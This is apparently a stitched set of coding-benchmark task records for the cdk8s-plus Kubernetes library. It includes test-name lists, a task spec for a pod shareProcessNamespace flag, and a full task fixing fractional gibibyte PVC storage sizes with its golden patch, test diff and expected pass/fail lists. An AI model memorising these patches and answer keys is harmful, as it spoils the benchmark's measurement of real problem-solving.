"\"restartPolicy\" property can be used to define restartPolicy", "can select a deployment", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an 
unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod 
isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload" ]
[ "defaultChild", "Can mutate metadata", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig 
secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a 
specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only 
limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single 
port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different 
volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different 
subjects", "cannot grant permissions twice with same subject" ]
Class: AbstractPod(props: AbstractPodProps) Location: src/pod.ts Inputs: `props` – an object conforming to `AbstractPodProps`; the new optional field `shareProcessNamespace?: boolean` (default false). Outputs: Instance property `shareProcessNamespace: boolean` (readonly) reflecting the value passed in `props`. Description: Adds support for the Kubernetes `shareProcessNamespace` pod‑spec flag, allowing containers in the same pod to share a process namespace when set to true. The default is false, preserving existing behavior. Interface: AbstractPodProps Location: src/pod.ts (interface definition) Inputs: Optional field `shareProcessNamespace?: boolean` (default false). Outputs: None (type definition). Description: Extends the pod property bag to accept a `shareProcessNamespace` flag, which is propagated to the pod manifest and enables process‑namespace sharing across containers in the pod.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "chensjlv", "pr_labels": [ "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch", "backport-to-k8s-30/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a shareProcessNamespace flag to the pod spec, with a link to Kubernetes docs for reference. The provided test snapshots are updated to expect the new field with a default false value, and the golden patch shows the necessary implementation changes, aligning with the stated requirements. No mismatches between tests and the described behavior are observed, and there are no signals of test suite coupling, implicit naming, external dependency issues, ambiguous specs, patch artifacts, or hidden domain knowledge. 
Therefore the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
510051b4969b3bae1c07befccebc9753cff5fcf0
2025-05-03 06:32:08
cdk8s-team__cdk8s-plus-5681
diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed Fixes https://github.com/cdk8s-team/cdk8s/issues/2511
**Title** Prevent unintended rounding of fractional gibibyte storage sizes in PVCs **Problem** When a PersistentVolumeClaim specifies a storage size that is not a whole gibibyte, the conversion to a Kubernetes quantity automatically rounded the value. This produced incorrect PVC specifications and broke expectations for users needing precise fractional sizes. **Root Cause** The size‑to‑Gi conversion used the default rounding behavior, which rounds to the nearest integer before forming the quantity string. **Fix / Expected Behavior** - Convert storage sizes to gibibytes with rounding disabled. - Preserve any fractional component in the resulting quantity string. - Emit PVC manifests that contain the exact size requested by the user. - Keep existing handling for cases where no storage size is defined. - Leave all other PVC fields and behavior unchanged. **Risk & Validation** - Verify that generated PVC manifests now include fractional “Gi” values and are accepted by Kubernetes. - Add or update unit tests for both whole‑number and fractional storage sizes to ensure correct conversion. - Confirm that other parts of the library that rely on size conversion continue to work with the new rounding option.
5,681
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "defaultChild", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can mutate metadata", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can create a RoleBinding from a Role", "can create a RoleBinding from a 
ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws 
if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is 
not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set 
to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a 
MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can 
have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer 
twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as 
the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add 
egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "ajacques", "pr_labels": [ "backport-to-k8s-30/main: Backport a PR to the k8s-30 branch", "backport-to-k8s-31/main: Backport a PR to the k8s-31 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s/issues/2511" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests allowing fractional GiB storage sizes for PersistentVolumeClaims, and the test adds a case using 512 Mi (0.5 Gi) expecting the manifest to contain \"0.5Gi\". The provided test aligns with the intended behavior and does not introduce unrelated expectations. No signals of test-suite coupling, implicit naming, external dependencies, ambiguity, unrelated patch artifacts, or implicit knowledge are present, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, 
"test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
54125191b08276e5165d67674b395ad6c9cc76c6
2025-05-07 15:40:53
cdk8s-team__cdk8s-plus-5707
